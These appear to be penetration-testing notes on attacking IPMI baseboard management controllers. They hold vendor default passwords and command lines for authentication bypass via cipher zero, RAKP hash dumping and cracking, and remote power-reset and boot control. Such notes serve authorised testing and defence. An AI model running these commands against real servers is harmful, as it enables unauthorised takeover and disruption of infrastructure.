IPMI Pentesting Notes

Protocol Overview

Basic Information

Port: UDP 623
Protocol Type: Hardware management protocol
Purpose: Remote server management and monitoring
Security: Various authentication methods, often poorly configured

Key Components

BMC (Baseboard Management Controller)
- Embedded Linux system
- Independent of host OS
- Manages hardware directly
Common Implementations
- HP iLO (Integrated Lights Out)
- Dell iDRAC
- Supermicro IPMI
- IBM IMM

Initial Enumeration

Port Scanning

# Basic UDP scan
sudo nmap -sU -p 623 <target>

# Version detection
sudo nmap -sU -p 623 -sV <target>

# IPMI-specific scripts
sudo nmap -sU -p 623 --script ipmi-* <target>

Version Detection

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS <target>
run

# Using nmap
sudo nmap -sU --script ipmi-version -p 623 <target>

# Using ipmitool
ipmitool -I lanplus -H <target> -p 623 chassis status

Default Credentials

Common Defaults

Vendor

Username

Password

Dell iDRAC

root

calvin

HP iLO

Administrator

<8-char random>

Supermicro

ADMIN

IBM IMM

USERID

PASSW0RD

Testing Default Access

# Using ipmitool
ipmitool -I lanplus -H <target> -U root -P calvin chassis status

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

Password Attacks

Hash Dumping

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <target>
run

# Using Python
mkdir output
python3 ipmipwner.py --host <target> --output ./output

Cracking Hashes

# IPMI v2.0 RAKP HMAC-SHA1 hashes
hashcat -m 7300 hashes.txt wordlist.txt

# Custom mask for HP iLO defaults (8 chars, uppercase + numbers)
hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

# Using John
john --format=rakp hashes.txt

Common NSE Scripts

# Run all IPMI scripts
sudo nmap -sU -p 623 --script ipmi-* <target>

# Important individual scripts
sudo nmap -sU -p 623 --script ipmi-version <target>      # Version detection
sudo nmap -sU -p 623 --script ipmi-cipher-zero <target>  # Cipher zero auth
sudo nmap -sU -p 623 --script ipmi-brute <target>        # Brute force

Exploitation Techniques

Cipher Zero Authentication

# Check for cipher zero
sudo nmap -sU -p 623 --script ipmi-cipher-zero <target>

# Exploit using ipmitool
ipmitool -I lanplus -H <target> -U '' -P '' -C 0 chassis status

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_cipher_zero
set RHOSTS <target>
run

RAKP Authentication Bypass

# Dump RAKP hashes
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <target>
run

# Offline cracking
hashcat -m 7300 rakp.txt wordlist.txt

Post Exploitation

Information Gathering

# Get system info
ipmitool -I lanplus -H <target> -U username -P password fru print

# Get sensor data
ipmitool -I lanplus -H <target> -U username -P password sensor list

# Get user list
ipmitool -I lanplus -H <target> -U username -P password user list

System Control

# Power operations
ipmitool -I lanplus -H <target> -U username -P password chassis power status
ipmitool -I lanplus -H <target> -U username -P password chassis power reset

# Boot device control
ipmitool -I lanplus -H <target> -U username -P password chassis bootdev pxe

Common Vulnerabilities

Authentication Issues:
- Default credentials
- Cipher Zero authentication
- RAKP authentication bypass
- Weak password policies
Configuration Problems:
- Exposed IPMI interfaces
- Outdated firmware
- Missing patches
- Weak network restrictions
Known CVEs:
- CVE-2013-4786 (Cipher Zero)
- CVE-2013-4787 (IPMI 2.0 RAKP Authentication)
- Multiple HP iLO vulnerabilities

Response Codes and Messages

Code

Meaning

0x00

Success

0xC0

Node Busy

0xC1

Invalid Command

0xC3

Timeout

0xC4

Out of Space

0xC5

Invalid Data

0xFF

Unspecified Error

Best Practices for Pentesting

Initial Reconnaissance:
- Port discovery
- Version detection
- Default credential testing
- Cipher support checking
Deep Enumeration:
- User enumeration
- Hash dumping
- Vulnerability scanning
- Configuration analysis
Documentation:
- Version information
- Found credentials
- Vulnerable configurations
- Successful exploits
Risk Assessment:
- Physical access implications
- Network exposure
- Credential security
- Patch status

Common Tools Summary

Enumeration:
- nmap
- ipmitool
- Metasploit modules
- Custom Python scripts
Exploitation:
- Metasploit
- hashcat
- John the Ripper
- ipmitool
Post-Exploitation:
- ipmitool
- IPMI management interfaces
- Custom scripts
- Web interfaces

PreviousSSH Pentesting Notes NextOracle TNS Pentesting Notes

hashtagProtocol Overview

hashtagBasic Information

hashtagKey Components

hashtagInitial Enumeration

hashtagPort Scanning

hashtagVersion Detection

hashtagDefault Credentials

hashtagCommon Defaults

hashtagTesting Default Access

hashtagPassword Attacks

hashtagHash Dumping

hashtagCracking Hashes

hashtagCommon NSE Scripts

hashtagExploitation Techniques

hashtagCipher Zero Authentication

hashtagRAKP Authentication Bypass

hashtagPost Exploitation

hashtagInformation Gathering

hashtagSystem Control

hashtagCommon Vulnerabilities

hashtagResponse Codes and Messages

hashtagBest Practices for Pentesting

hashtagCommon Tools Summary